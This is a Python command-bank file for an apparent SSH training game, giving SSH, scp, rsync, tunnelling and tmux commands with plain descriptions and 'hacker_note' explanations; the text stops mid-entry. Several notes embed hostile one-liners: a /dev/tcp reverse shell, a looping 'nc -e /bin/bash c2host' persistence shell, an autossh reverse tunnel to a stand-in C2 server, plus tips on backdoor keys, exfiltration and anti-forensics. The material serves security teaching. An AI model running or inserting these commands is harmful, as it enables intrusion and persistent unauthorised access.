"""SSH Commander — expanded command bank.

80+ SSH commands across 5 categories. Each entry is a dict with:
  cmd          — the command template (with <placeholders>)
  syntax       — full usage example
  what         — one-line plain-English description
  category     — one of: connect, files, tunnels, manage, harden
  level        — 1=beginner, 2=intermediate, 3=advanced
  boss         — if True, eligible for Boss mode scenarios
  aliases      — alternative forms the user might type
  hacker_note  — why a real hacker, pen tester, or sysadmin reaches for this command

Drop-in replacement for commands.py — same COMMANDS list structure,
same helper functions, plus the new hacker_note field on every entry.
"""

from typing import Dict, List

CATEGORIES = [
    "connect",      # connecting, auth, keys
    "files",        # SCP, SFTP, rsync
    "tunnels",      # port forwarding, SOCKS
    "manage",       # remote commands, sessions, tmux
    "harden",       # security, known_hosts, config
]

COMMANDS: List[Dict] = [
    # ── CONNECT ──────────────────────────────────────────────────────────────
    {
        "cmd": "ssh <user>@<host>",
        "syntax": "ssh pi@192.168.1.100",
        "what": "Open a shell on a remote machine",
        "category": "connect", "level": 1, "boss": True,
        "aliases": [],
        "hacker_note": "The entry point for every remote attack chain — once you have valid creds or a key, this is step one of lateral movement inside a compromised network.",
    },
    {
        "cmd": "ssh -p <port> <user>@<host>",
        "syntax": "ssh -p 2222 pi@192.168.1.100",
        "what": "Connect to a non-standard port",
        "category": "connect", "level": 1, "boss": False,
        "aliases": [],
        "hacker_note": "Admins move SSH off port 22 to dodge script-kiddie scanners; red teamers always scan the full port range with nmap -sV to find it anyway — security through obscurity is not security.",
    },
    {
        "cmd": "ssh -i <keyfile> <user>@<host>",
        "syntax": "ssh -i ~/.ssh/id_ed25519 pi@192.168.1.100",
        "what": "Connect using a specific private key",
        "category": "connect", "level": 2, "boss": True,
        "aliases": [],
        "hacker_note": "During post-exploitation, attackers scour ~/.ssh/ for unprotected private keys — any key found there may unlock other hosts in the environment, a technique covered in MITRE ATT&CK T1145 (Private Keys).",
    },
    {
        "cmd": "ssh-keygen -t ed25519 -C <comment>",
        "syntax": "ssh-keygen -t ed25519 -C 'my-laptop'",
        "what": "Generate a new SSH key pair (ed25519 is modern best practice)",
        "category": "connect", "level": 2, "boss": True,
        "aliases": [],
        "hacker_note": "Red teamers generate per-op throwaway ed25519 keys so each engagement has unique key material — if one key is burned, others stay clean; also forces defenders to track more IOCs (indicators of compromise).",
    },
    {
        "cmd": "ssh-copy-id <user>@<host>",
        "syntax": "ssh-copy-id pi@192.168.1.100",
        "what": "Install your public key on the remote machine (no more passwords)",
        "category": "connect", "level": 2, "boss": True,
        "aliases": [],
        "hacker_note": "Attackers with temporary password access plant their public key in authorized_keys to establish persistent backdoor access that survives a password change — a classic persistence technique (MITRE T1098.004).",
    },
    {
        "cmd": "ssh-copy-id -i <keyfile>.pub <user>@<host>",
        "syntax": "ssh-copy-id -i ~/.ssh/id_ed25519.pub pi@192.168.1.100",
        "what": "Copy a specific public key to the remote machine",
        "category": "connect", "level": 2, "boss": False,
        "aliases": [],
        "hacker_note": "Useful when you have multiple keys for different ops — lets you plant precisely the right public key on a target without accidentally adding your personal key and leaving a forensic trail.",
    },
    {
        "cmd": "ssh-add <keyfile>",
        "syntax": "ssh-add ~/.ssh/id_ed25519",
        "what": "Add a key to the SSH agent so you don't need to type the passphrase again",
        "category": "connect", "level": 2, "boss": False,
        "aliases": [],
        "hacker_note": "Agent hijacking (ssh-add -l on a compromised box) lets an attacker list and use loaded keys without ever seeing the passphrase — this is why leaving keys loaded in an agent on a shared server is dangerous.",
    },
    {
        "cmd": "ssh-add -l",
        "syntax": "ssh-add -l",
        "what": "List keys currently loaded in the SSH agent",
        "category": "connect", "level": 2, "boss": False,
        "aliases": [],
        "hacker_note": "First thing a post-exploitation script checks on a compromised host — if a privileged user's key is loaded in the agent and SSH_AUTH_SOCK is readable, an attacker can hijack the agent socket and pivot without touching the private key file.",
    },
    {
        "cmd": "ssh -A <user>@<host>",
        "syntax": "ssh -A pi@192.168.1.100",
        "what": "Enable agent forwarding so the remote can use your local keys",
        "category": "connect", "level": 3, "boss": False,
        "aliases": [],
        "hacker_note": "Agent forwarding is a classic double-edged sword: convenient for multi-hop pivoting, but any root user on the intermediate host can steal the forwarded agent socket and impersonate you to every host your key unlocks — the NSA's FOXACID slides specifically call this out.",
    },
    {
        "cmd": "ssh -o StrictHostKeyChecking=no <user>@<host>",
        "syntax": "ssh -o StrictHostKeyChecking=no pi@192.168.1.100",
        "what": "Skip the 'are you sure you trust this host?' prompt (use carefully)",
        "category": "connect", "level": 2, "boss": False,
        "aliases": [],
        "hacker_note": "Disabling host key checking is the precondition for a classic SSH MITM (man-in-the-middle) attack — attackers on the same network can intercept the connection and present their own key; blue teamers watch for this flag in process logs as a red flag.",
    },
    {
        "cmd": "cat ~/.ssh/known_hosts",
        "syntax": "cat ~/.ssh/known_hosts",
        "what": "Show all hosts you've previously trusted",
        "category": "connect", "level": 1, "boss": False,
        "aliases": [],
        "hacker_note": "Post-exploitation goldmine — known_hosts reveals every server the compromised user has ever SSH'd to, giving an attacker a ready-made target list for lateral movement without any network scanning.",
    },
    {
        "cmd": "ssh-keyscan -H <host> >> ~/.ssh/known_hosts",
        "syntax": "ssh-keyscan -H 192.168.1.100 >> ~/.ssh/known_hosts",
        "what": "Pre-trust a host's key without manually connecting first",
        "category": "connect", "level": 3, "boss": False,
        "aliases": [],
        "hacker_note": "Automation pipelines use this to pre-populate known_hosts and suppress interactive prompts, but blindly trusting a key fetched over the network defeats the entire TOFU (trust on first use) security model.",
    },
    # ── CONNECT — NEW COMMANDS ────────────────────────────────────────────────
    {
        "cmd": "ssh -J <jumphost> <user>@<host>",
        "syntax": "ssh -J bastion@10.0.0.1 admin@192.168.10.5",
        "what": "ProxyJump shorthand — hop through a jump host to reach a target in one command",
        "category": "connect", "level": 3, "boss": True,
        "aliases": ["ssh -o ProxyJump="],
        "hacker_note": "Red teamers chain multiple -J hops (ssh -J hop1,hop2 target) to pivot deep into segmented networks — each jump host only sees the connection from the previous hop, making attribution harder.",
    },
    {
        "cmd": "ssh -o ProxyCommand='ssh -W %h:%p <jumpuser>@<jumphost>' <user>@<host>",
        "syntax": "ssh -o ProxyCommand='ssh -W %h:%p bastion@10.0.0.1' admin@192.168.10.5",
        "what": "ProxyCommand with stdio forwarding — the original way to tunnel through a jump host",
        "category": "connect", "level": 3, "boss": True,
        "aliases": [],
        "hacker_note": "ProxyCommand is more flexible than -J: you can chain netcat, ncat, or custom scripts as the proxy — red teamers abuse this to route SSH through HTTP CONNECT proxies inside corporate perimeters where only port 80/443 egress is allowed.",
    },
    {
        "cmd": "ssh -W <host>:<port> <jumpuser>@<jumphost>",
        "syntax": "ssh -W 192.168.10.5:22 bastion@10.0.0.1",
        "what": "stdio forwarding mode — connects stdin/stdout to the remote host:port (used as a ProxyCommand)",
        "category": "connect", "level": 3, "boss": True,
        "aliases": [],
        "hacker_note": "The building block of multi-hop proxy chains — each -W link in the chain passes raw bytes without exposing them to the intermediate node, so the jump host never gets a shell or sees plaintext traffic.",
    },
    {
        "cmd": "ssh -o ControlMaster=auto -o ControlPath=~/.ssh/cm_%r@%h:%p -o ControlPersist=10m <user>@<host>",
        "syntax": "ssh -o ControlMaster=auto -o ControlPath=~/.ssh/cm_%r@%h:%p -o ControlPersist=10m pi@192.168.1.100",
        "what": "SSH multiplexing — reuse one TCP connection for multiple sessions (blazing fast reconnects)",
        "category": "connect", "level": 3, "boss": False,
        "aliases": [],
        "hacker_note": "Pen testers use ControlMaster to open one authenticated channel and spin up dozens of sessions without re-authenticating each time — crucial when targeting servers with rate-limited auth or hardware 2FA tokens.",
    },
    {
        "cmd": "ssh-keygen -s <ca_key> -I <identity> -n <principals> -V <validity> <pub_key>",
        "syntax": "ssh-keygen -s ca_key -I 'user-laptop' -n 'pi,ubuntu' -V +52w id_ed25519.pub",
        "what": "Sign a public key with a CA (certificate authority) key — enterprise short-lived auth",
        "category": "connect", "level": 3, "boss": True,
        "aliases": [],
        "hacker_note": "If an attacker compromises the SSH CA private key in an enterprise environment, they can mint certificates granting access to every server that trusts that CA — a single key compromise becomes a total network compromise (seen in several major cloud breaches).",
    },
    {
        "cmd": "ssh-keygen -L -f <cert_file>",
        "syntax": "ssh-keygen -L -f ~/.ssh/id_ed25519-cert.pub",
        "what": "Inspect a signed SSH certificate — shows principals, validity window, and extensions",
        "category": "connect", "level": 3, "boss": False,
        "aliases": [],
        "hacker_note": "Blue teamers use this to audit certificates on compromised hosts — checking the principals field reveals which accounts are accessible and checking the validity window shows if attackers minted a long-lived cert to maintain persistence.",
    },
    {
        "cmd": "ssh-keygen -p -f <keyfile>",
        "syntax": "ssh-keygen -p -f ~/.ssh/id_ed25519",
        "what": "Change the passphrase on an existing private key without regenerating the key",
        "category": "connect", "level": 2, "boss": False,
        "aliases": [],
        "hacker_note": "Attackers who find a passphrase-protected key can strip the passphrase with -p and set an empty one, making it usable in automated scripts — blue teamers should monitor for ssh-keygen -p calls in audit logs.",
    },
    {
        "cmd": "ssh -o IdentitiesOnly=yes -i <keyfile> <user>@<host>",
        "syntax": "ssh -o IdentitiesOnly=yes -i ~/.ssh/deploy_key pi@192.168.1.100",
        "what": "Use ONLY the specified key — prevents SSH from trying all agent-loaded keys",
        "category": "connect", "level": 3, "boss": False,
        "aliases": [],
        "hacker_note": "Without IdentitiesOnly=yes, SSH offers every key loaded in the agent to the server — each rejected key is logged on the server side, allowing defenders to fingerprint the attacker's entire key inventory just from failed auth attempts.",
    },
    # ── FILES ────────────────────────────────────────────────────────────────
    {
        "cmd": "scp <file> <user>@<host>:<dest>",
        "syntax": "scp report.txt pi@192.168.1.100:/home/pi/",
        "what": "Copy a file from local machine to remote",
        "category": "files", "level": 1, "boss": True,
        "aliases": [],
        "hacker_note": "Used for staging implants and toolkits onto a compromised host — attackers prefer scp over wget/curl because it blends in with normal admin activity and uses the already-open SSH connection.",
    },
    {
        "cmd": "scp <user>@<host>:<file> <dest>",
        "syntax": "scp pi@192.168.1.100:/home/pi/log.txt ./",
        "what": "Download a file from remote to local machine",
        "category": "files", "level": 1, "boss": True,
        "aliases": [],
        "hacker_note": "Classic exfiltration path — attackers pull /etc/shadow, database dumps, or private keys over scp because it's encrypted and looks identical to legitimate file transfers in network logs.",
    },
    {
        "cmd": "scp -r <dir> <user>@<host>:<dest>",
        "syntax": "scp -r ./project pi@192.168.1.100:/home/pi/",
        "what": "Copy an entire folder to a remote machine",
        "category": "files", "level": 1, "boss": True,
        "aliases": [],
        "hacker_note": "Bulk exfiltration of source code repositories, config directories, or entire home folders in one shot — defenders watch for large scp transfers (MB+) to external IPs as a data loss indicator.",
    },
    {
        "cmd": "scp -P <port> <file> <user>@<host>:<dest>",
        "syntax": "scp -P 2222 report.txt pi@192.168.1.100:/tmp/",
        "what": "SCP over a non-standard port (note capital -P, unlike ssh's lowercase -p)",
        "category": "files", "level": 2, "boss": False,
        "aliases": [],
        "hacker_note": "The asymmetric -P / -p flag between scp and ssh trips up scripts and muscle memory — attackers rely on this confusion to get analysts to misread their exfiltration commands during live incident response.",
    },
    {
        "cmd": "rsync -avz <src> <user>@<host>:<dest>",
        "syntax": "rsync -avz ./data/ pi@192.168.1.100:/home/pi/data/",
        "what": "Sync a folder to remote — only sends changed files (much faster than scp for big dirs)",
        "category": "files", "level": 2, "boss": True,
        "aliases": [],
        "hacker_note": "Red teamers use rsync to stage tool drops incrementally — only new or changed payloads transfer, reducing bandwidth and detection window compared to a full directory push each time.",
    },
    {
        "cmd": "rsync -avz --delete <src> <user>@<host>:<dest>",
        "syntax": "rsync -avz --delete ./data/ pi@192.168.1.100:/home/pi/data/",
        "what": "Sync folder AND delete remote files that no longer exist locally",
        "category": "files", "level": 2, "boss": False,
        "aliases": [],
        "hacker_note": "Used in anti-forensics cleanup scripts — attackers sync a clean directory to a compromised host with --delete to wipe their toolkit from the remote after an op, leaving no artifact trail.",
    },
    {
        "cmd": "rsync -avz <user>@<host>:<src> <dest>",
        "syntax": "rsync -avz pi@192.168.1.100:/home/pi/data/ ./backup/",
        "what": "Pull a remote folder down to local",
        "category": "files", "level": 2, "boss": False,
        "aliases": [],
        "hacker_note": "Efficient bulk exfiltration of large directories — rsync's delta algorithm means if an attacker is caught mid-transfer and restarts, it picks up where it left off instead of retransferring everything.",
    },
    {
        "cmd": "sftp <user>@<host>",
        "syntax": "sftp pi@192.168.1.100",
        "what": "Open an interactive file transfer session (type 'ls', 'get', 'put')",
        "category": "files", "level": 1, "boss": False,
        "aliases": [],
        "hacker_note": "SFTP sessions show up in SSH server logs as subsystem requests — forensic analysts looking for lateral movement check for sftp subsystem activity from unusual source IPs or at unusual hours.",
    },
    {
        "cmd": "sftp> get <remotefile>",
        "syntax": "get /home/pi/data.csv",
        "what": "Download a file inside an sftp session",
        "category": "files", "level": 1, "boss": False,
        "aliases": [],
        "hacker_note": "Inside an SFTP session, 'get' with a wildcard (get /etc/ssh/*) lets an attacker pull all SSH server config and host keys in one move — the host keys can then be used to impersonate that server in MITM attacks.",
    },
    {
        "cmd": "sftp> put <localfile>",
        "syntax": "put report.pdf",
        "what": "Upload a file inside an sftp session",
        "category": "files", "level": 1, "boss": False,
        "aliases": [],
        "hacker_note": "Attackers use sftp put to drop web shells or cronjobs onto a target when they have write access to a web root or cron directory — the file write looks like a normal SFTP transfer, not a 'command execution'.",
    },
    # ── FILES — NEW COMMANDS ──────────────────────────────────────────────────
    {
        "cmd": "rsync -avz --exclude '<pattern>' <src> <user>@<host>:<dest>",
        "syntax": "rsync -avz --exclude '*.log' --exclude '.git/' ./project/ pi@192.168.1.100:/opt/app/",
        "what": "Sync a folder but skip files matching a pattern (logs, git dirs, secrets)",
        "category": "files", "level": 2, "boss": False,
        "aliases": [],
        "hacker_note": "Sysadmins use --exclude '*.key' and --exclude '.env' to prevent rsync from accidentally uploading credentials to a remote host — a missing exclude has caused several public cloud credential exposure incidents.",
    },
    {
        "cmd": "rsync -avz --dry-run <src> <user>@<host>:<dest>",
        "syntax": "rsync -avz --dry-run ./data/ pi@192.168.1.100:/backup/",
        "what": "Preview exactly what rsync would transfer without actually moving anything",
        "category": "files", "level": 2, "boss": False,
        "aliases": ["rsync -avzn"],
        "hacker_note": "Before a large data pull during a CTF or red team op, --dry-run reveals the full file list and total size without triggering file access timestamps — useful for scoping an exfil before committing to it.",
    },
    {
        "cmd": "rsync -avz --checksum <src> <user>@<host>:<dest>",
        "syntax": "rsync -avz --checksum ./dist/ pi@192.168.1.100:/var/www/",
        "what": "Use file checksums (not just timestamps) to decide what needs syncing — catches silent file modifications",
        "category": "files", "level": 2, "boss": False,
        "aliases": [],
        "hacker_note": "Blue teamers use --checksum in integrity verification workflows — if an attacker modified a file but kept the original timestamp (timestamp-stomping is a common anti-forensics move), --checksum still detects the change.",
    },
    {
        "cmd": "rsync -avz -e 'ssh -i <keyfile> -p <port>' <src> <user>@<host>:<dest>",
        "syntax": "rsync -avz -e 'ssh -i ~/.ssh/deploy_key -p 2222' ./dist/ pi@192.168.1.100:/var/www/",
        "what": "rsync over SSH with a custom key and port — full control over the underlying SSH connection",
        "category": "files", "level": 3, "boss": False,
        "aliases": [],
        "hacker_note": "The -e flag lets you chain rsync through a ProxyCommand, routing file transfers through a jump host or SOCKS proxy — useful for exfiltrating data from an air-gapped segment via a pivot box.",
    },
    # ── TUNNELS ───────────────────────────────────────────────────────────────
    {
        "cmd": "ssh -L <localport>:<remotehost>:<remoteport> <user>@<host>",
        "syntax": "ssh -L 8080:localhost:80 pi@192.168.1.100",
        "what": "Local tunnel — reach remote port 80 at localhost:8080 on your machine",
        "category": "tunnels", "level": 3, "boss": True,
        "aliases": [],
        "hacker_note": "Red teamers use local forwarding to access internal web apps, databases (MySQL on 3306), or RDP (3389) on hosts that are reachable only from the compromised box — exposes private services to your attacker machine.",
    },
    {
        "cmd": "ssh -R <remoteport>:<localhost>:<localport> <user>@<host>",
        "syntax": "ssh -R 9090:localhost:3000 pi@192.168.1.100",
        "what": "Remote tunnel — expose your local port 3000 as port 9090 on the remote server",
        "category": "tunnels", "level": 3, "boss": True,
        "aliases": [],
        "hacker_note": "The classic C2 (command and control) reverse tunnel pattern: the victim machine calls out to the attacker's VPS on port 443 (allowed by most firewalls), and the attacker connects back in through the reverse-bound port — firewall traversal without inbound rules.",
    },
    {
        "cmd": "ssh -D <port> <user>@<host>",
        "syntax": "ssh -D 1080 pi@192.168.1.100",
        "what": "SOCKS5 proxy — route browser traffic through the remote machine",
        "category": "tunnels", "level": 3, "boss": False,
        "aliases": [],
        "hacker_note": "Pivoting mainstay: pair -D with proxychains (proxychains nmap ...) to route any tool through the SOCKS proxy and scan the internal network from the attacker's machine as if they were on the compromised host.",
    },
    {
        "cmd": "ssh -N -L <localport>:<remotehost>:<remoteport> <user>@<host>",
        "syntax": "ssh -N -L 5432:localhost:5432 pi@192.168.1.100",
        "what": "Background tunnel only (no shell) — -N means 'no command, just forward'",
        "category": "tunnels", "level": 3, "boss": True,
        "aliases": [],
        "hacker_note": "-N makes tunnel processes look less suspicious in ps output because there's no interactive shell — attackers combine it with -f to background the process so it persists after the terminal closes.",
    },
    {
        "cmd": "ssh -fN -L <localport>:<remotehost>:<remoteport> <user>@<host>",
        "syntax": "ssh -fN -L 5432:localhost:5432 pi@192.168.1.100",
        "what": "Fork to background AND don't execute a command — tunnel runs silently",
        "category": "tunnels", "level": 3, "boss": False,
        "aliases": [],
        "hacker_note": "This is how persistent covert tunnels are established without a hanging terminal — the -fN combo is a signature pattern in malicious SSH activity that defenders hunt for in process trees.",
    },
    # ── TUNNELS — NEW COMMANDS ────────────────────────────────────────────────
    {
        "cmd": "ssh -R 0.0.0.0:<remoteport>:localhost:<localport> <user>@<host>",
        "syntax": "ssh -R 0.0.0.0:4444:localhost:4444 attacker@c2server.com",
        "what": "Reverse tunnel binding on all interfaces on the remote — anyone who can reach the remote host can connect in",
        "category": "tunnels", "level": 3, "boss": True,
        "aliases": [],
        "hacker_note": "Binding 0.0.0.0 (all interfaces) instead of 127.0.0.1 makes the tunnel accessible to the entire internet, not just localhost — requires GatewayPorts yes in sshd_config on the C2 server, and is how APT groups provide team-wide access to a victim network through one tunnel.",
    },
    {
        "cmd": "autossh -M <monitor_port> -fN -R <remoteport>:localhost:<localport> <user>@<host>",
        "syntax": "autossh -M 20000 -fN -R 2222:localhost:22 user@c2server.com",
        "what": "Persistent reverse SSH tunnel that automatically reconnects if the connection drops",
        "category": "tunnels", "level": 3, "boss": True,
        "aliases": [],
        "hacker_note": "autossh is the canonical persistent C2 channel tool — it monitors the tunnel with a keepalive probe on the monitor port and respawns the SSH process the moment it dies, giving attackers a reliable reverse shell that survives reboots if added to rc.local or a systemd service.",
    },
    {
        "cmd": "ssh -fNT -D <port> -o ExitOnForwardFailure=yes <user>@<host>",
        "syntax": "ssh -fNT -D 9050 -o ExitOnForwardFailure=yes pi@192.168.1.100",
        "what": "Background SOCKS5 proxy with -T (no TTY) and auto-exit if forwarding fails",
        "category": "tunnels", "level": 3, "boss": False,
        "aliases": [],
        "hacker_note": "Adding ExitOnForwardFailure=yes means if the SOCKS port is already in use the process exits cleanly instead of silently running without a working tunnel — critical in automated attack scripts that spawn multiple tunnels.",
    },
    {
        "cmd": "ssh -L <localport>:127.0.0.1:<remoteport> -L <localport2>:127.0.0.1:<remoteport2> <user>@<host>",
        "syntax": "ssh -L 3306:127.0.0.1:3306 -L 6379:127.0.0.1:6379 pi@192.168.1.100",
        "what": "Multiple local tunnels in one command — forward several internal ports at once",
        "category": "tunnels", "level": 3, "boss": True,
        "aliases": [],
        "hacker_note": "In internal network pivoting, attackers chain multiple -L flags to simultaneously expose a database, an admin panel, and a cache service — one SSH command gives them a full internal attack surface on localhost.",
    },
    # ── MANAGE ────────────────────────────────────────────────────────────────
    {
        "cmd": "ssh <user>@<host> '<command>'",
        "syntax": "ssh pi@192.168.1.100 'uptime'",
        "what": "Run a single command on the remote machine without opening an interactive shell",
        "category": "manage", "level": 1, "boss": True,
        "aliases": [],
        "hacker_note": "Non-interactive command execution leaves fewer traces than an interactive shell session — attackers use one-liners like 'bash -i >& /dev/tcp/10.0.0.1/4444 0>&1' to spawn a reverse shell without ever touching the terminal.",
    },
    {
        "cmd": "ssh <user>@<host> 'sudo systemctl restart <service>'",
        "syntax": "ssh pi@192.168.1.100 'sudo systemctl restart nginx'",
        "what": "Restart a service on the remote machine in one shot",
        "category": "manage", "level": 2, "boss": True,
        "aliases": [],
        "hacker_note": "Attackers with sudoers access restart services after dropping malicious configs — e.g., restart nginx after modifying a reverse proxy config to relay traffic to a C2 server.",
    },
    {
        "cmd": "ssh <user>@<host> 'nohup <cmd> &'",
        "syntax": "ssh pi@192.168.1.100 'nohup python3 server.py &'",
        "what": "Start a process that keeps running even after you disconnect",
        "category": "manage", "level": 2, "boss": True,
        "aliases": [],
        "hacker_note": "Classic persistence one-liner: 'nohup bash -c \"while true; do nc -e /bin/bash c2host 4444; sleep 5; done\" &' drops a persistent reverse shell that reconnects every 5 seconds — survives SSH session termination.",
    },
    {
        "cmd": "ssh -t <user>@<host> 'top'",
        "syntax": "ssh -t pi@192.168.1.100 'top'",
        "what": "Force a TTY for interactive programs like top or vim over SSH",
        "category": "manage", "level": 2, "boss": False,
        "aliases": [],
        "hacker_note": "-t is required to run sudo interactively over SSH when no NOPASSWD is set — penetration testers use it to run sudo commands that require a terminal for the password prompt without opening a full interactive session.",
    },
    {
        "cmd": "tmux new -s <name>",
        "syntax": "tmux new -s work",
        "what": "Start a named tmux session that survives SSH disconnects",
        "category": "manage", "level": 2, "boss": True,
        "aliases": [],
        "hacker_note": "Red teamers name tmux sessions with innocent-sounding names ('cron', 'logrotate') so their persistent interactive sessions blend in if someone lists running processes on the compromised host.",
    },
    {
        "cmd": "tmux attach -t <name>",
        "syntax": "tmux attach -t work",
        "what": "Re-attach to a running tmux session",
        "category": "manage", "level": 2, "boss": True,
        "aliases": ["tmux a -t"],
        "hacker_note": "Attackers use tmux to maintain long-running sessions across intermittent connectivity — if their SSH connection drops (or the blue team kills their session), they reconnect and reattach without losing context.",
    },
    {
        "cmd": "tmux ls",
        "syntax": "tmux ls",
        "what": "List all running tmux sessions",
        "category": "manage", "level": 1, "boss": False,
        "aliases": [],
        "hacker_note": "Incident responders check tmux ls on every compromised host to find attacker sessions still running in the background — a hidden tmux session with a reverse shell inside is a strong indicator of active compromise.",
    },
    {
        "cmd": "tmux kill-session -t <name>",
        "syntax": "tmux kill-session -t work",
        "what": "Kill a specific tmux session",
        "category": "manage", "level": 2, "boss": False,
        "aliases": [],
        "hacker_note": "Blue teamers use this during incident response to terminate attacker sessions cleanly — but be aware that killing the session may trigger the attacker's autossh to reconnect within seconds if persistence is in place.",
    },
    {
        "cmd": "screen -S <name>",
        "syntax": "screen -S mywork",
        "what": "Start a named screen session (older alternative to tmux)",
        "category": "manage", "level": 2, "boss": False,
        "aliases": [],
        "hacker_note": "Screen is pre-installed on more legacy systems than tmux — attackers on older RHEL/CentOS targets default to screen for persistent sessions when tmux isn't available.",
    },
    {
        "cmd": "screen -r <name>",
        "syntax": "screen -r mywork",
        "what": "Re-attach to a running screen session",
        "category": "manage", "level": 2, "boss": False,
        "aliases": [],
        "hacker_note": "On shared multi-user servers, screen -r can reattach to sessions owned by other users if you have the right UID — a privilege escalation path that's been exploited in shared hosting environments.",
    },
    {
        "cmd": "ssh -o ServerAliveInterval=60 <user>@<host>",
        "syntax": "ssh -o ServerAliveInterval=60 pi@192.168.1.100",
        "what": "Send keepalive pings every 60s so the connection doesn't drop on idle",
        "category": "manage", "level": 2, "boss": False,
        "aliases": [],
        "hacker_note": "Without keepalives, enterprise firewalls drop idle SSH connections after a few minutes — attackers always set ServerAliveInterval so their covert tunnel stays alive through the corporate NAT session timeout.",
    },
    {
        "cmd": "ssh -o ConnectTimeout=<seconds> <user>@<host>",
        "syntax": "ssh -o ConnectTimeout=5 pi@192.168.1.100",
        "what": "Fail fast instead of hanging when the host is unreachable",
        "category": "manage", "level": 2, "boss": False,
        "aliases": [],
        "hacker_note": "Essential in mass scanning scripts — setting ConnectTimeout=1 or 2 lets attackers iterate across thousands of IPs in a subnet without each unreachable host stalling the script for 30+ seconds.",
    },
    {
        "cmd": "ssh -v <user>@<host>",
        "syntax": "ssh -v pi@192.168.1.100",
        "what": "Verbose mode — shows exactly what's happening during connection (use for debugging)",
        "category": "manage", "level": 2, "boss": False,
        "aliases": [],
        "hacker_note": "Verbose output reveals which key files SSH is trying, which authentication methods the server accepts, and the server's host key fingerprint — all reconnaissance gold before attempting a targeted attack.",
    },
    {
        "cmd": "ssh -vvv <user>@<host>",
        "syntax": "ssh -vvv pi@192.168.1.100",
        "what": "Maximum debug output — shows every packet and cipher negotiation",
        "category": "manage", "level": 3, "boss": False,
        "aliases": [],
        "hacker_note": "The cipher negotiation output from -vvv reveals the exact algorithm suite the server supports — if the server accepts weak ciphers like arcfour or 3DES, a downgrade attack or decryption of captured traffic becomes feasible.",
    },
    # ── MANAGE — NEW COMMANDS ────────────────────────────────────────────────
    {
        "cmd": "for host in <host1> <host2> <host3>; do ssh <user>@$host '<command>'; done",
        "syntax": "for host in 10.0.0.1 10.0.0.2 10.0.0.3; do ssh pi@$host 'hostname'; done",
        "what": "Run a command across multiple hosts in a loop (poor-man's parallel-ssh)",
        "category": "manage", "level": 2, "boss": True,
        "aliases": [],
        "hacker_note": "The shell-loop equivalent of pssh — attackers use this to execute commands across every machine they've already compromised, checking who's logged in, grabbing /etc/passwd, or deploying a next-stage payload to all hosts at once.",
    },
    {
        "cmd": "parallel-ssh -h <hostfile> -l <user> '<command>'",
        "syntax": "parallel-ssh -h targets.txt -l pi 'cat /etc/passwd'",
        "what": "Run a command on many hosts in parallel simultaneously (requires parallel-ssh / pssh)",
        "category": "manage", "level": 3, "boss": True,
        "aliases": ["pssh -h"],
        "hacker_note": "During wide-area lateral movement ops, parallel-ssh lets red teamers execute a command on 50+ compromised hosts in seconds — dropping a reverse shell or exfiltrating /etc/shadow across an entire subnet before defenders notice the first alert.",
    },
    {
        "cmd": "ssh -o BatchMode=yes -o ConnectTimeout=3 <user>@<host> exit 2>&1 | head -1",
        "syntax": "ssh -o BatchMode=yes -o ConnectTimeout=3 pi@192.168.1.100 exit 2>&1 | head -1",
        "what": "Banner grab and reachability check — test SSH without password, capture server response",
        "category": "manage", "level": 3, "boss": False,
        "aliases": [],
        "hacker_note": "BatchMode=yes disables interactive auth prompts, making this safe to run against unknown hosts without stalling — the server's error response leaks its OpenSSH version, which maps directly to known CVEs like CVE-2023-38408 (ssh-agent RCE).",
    },
    # ── HARDEN ────────────────────────────────────────────────────────────────
    {
        "cmd": "ssh-keygen -R <host>",
        "syntax": "ssh-keygen -R 192.168.1.100",
        "what": "Remove a host from known_hosts (use after a server reinstall to fix 'host key changed' errors)",
        "category": "harden", "level": 2, "boss": True,
        "aliases": [],
        "hacker_note": "A 'WARNING: REMOTE HOST IDENTIFICATION HAS CHANGED' error is sometimes dismissed by running -R, but it should first be treated as a potential MITM attack — an attacker who controls the network can swap in their own host key.",
    },
    {
        "cmd": "chmod 600 ~/.ssh/id_ed25519",
        "syntax": "chmod 600 ~/.ssh/id_ed25519",
        "what": "Tighten private key permissions — SSH refuses to use keys that are world-readable",
        "category": "harden", "level": 1, "boss": True,
        "aliases": [],
        "hacker_note": "A group- or world-readable private key is the most common SSH misconfiguration found during internal pen tests — any user on a shared server can copy it, especially if the /home directory is also too permissive.",
    },
    {
        "cmd": "chmod 700 ~/.ssh",
        "syntax": "chmod 700 ~/.ssh",
        "what": "Tighten .ssh directory permissions — required for SSH to use your keys",
        "category": "harden", "level": 1, "boss": True,
        "aliases": [],
        "hacker_note": "OpenSSH silently ignores authorized_keys if the ~/.ssh directory is group-writable — attackers exploit this quirk to prevent defenders from adding their own keys to lock an attacker out by simply making the dir group-writable.",
    },
    {
        "cmd": "chmod 644 ~/.ssh/authorized_keys",
        "syntax": "chmod 644 ~/.ssh/authorized_keys",
        "what": "Set correct permissions on authorized_keys (must be readable but not group/world writable)",
        "category": "harden", "level": 2, "boss": False,
        "aliases": [],
        "hacker_note": "If authorized_keys is world-writable, any unprivileged user on the box can append their own public key and gain SSH access as the target user — a privilege escalation path on shared hosts with loose umask settings.",
    },
    {
        "cmd": "cat ~/.ssh/id_ed25519.pub",
        "syntax": "cat ~/.ssh/id_ed25519.pub",
        "what": "Print your public key — copy this to paste into authorized_keys on a server",
        "category": "harden", "level": 1, "boss": True,
        "aliases": [],
        "hacker_note": "Public keys are meant to be shared, but dumping them tells you which key type and comment (e.g., user@hostname) is in use — during recon, the comment field often reveals the operator's username and machine name.",
    },
    {
        "cmd": "cat ~/.ssh/id_ed25519.pub >> ~/.ssh/authorized_keys",
        "syntax": "cat ~/.ssh/id_ed25519.pub >> ~/.ssh/authorized_keys",
        "what": "Add your public key to the list of keys allowed to log in",
        "category": "harden", "level": 2, "boss": True,
        "aliases": [],
        "hacker_note": "The manual equivalent of ssh-copy-id — attackers prefer the >> redirect method because it works even when ssh-copy-id isn't available and doesn't require password auth if they already have shell access.",
    },
    {
        "cmd": "sudo nano /etc/ssh/sshd_config",
        "syntax": "sudo nano /etc/ssh/sshd_config",
        "what": "Edit the SSH server config (change port, disable password auth, etc.)",
        "category": "harden", "level": 3, "boss": True,
        "aliases": [],
        "hacker_note": "An attacker with root access who adds 'PermitRootLogin yes' and 'PasswordAuthentication yes' to sshd_config can open the server to password-based root login from anywhere — always review this file during incident response.",
    },
    {
        "cmd": "sudo systemctl restart sshd",
        "syntax": "sudo systemctl restart sshd",
        "what": "Reload the SSH server after changing its config",
        "category": "harden", "level": 2, "boss": True,
        "aliases": ["sudo service ssh restart"],
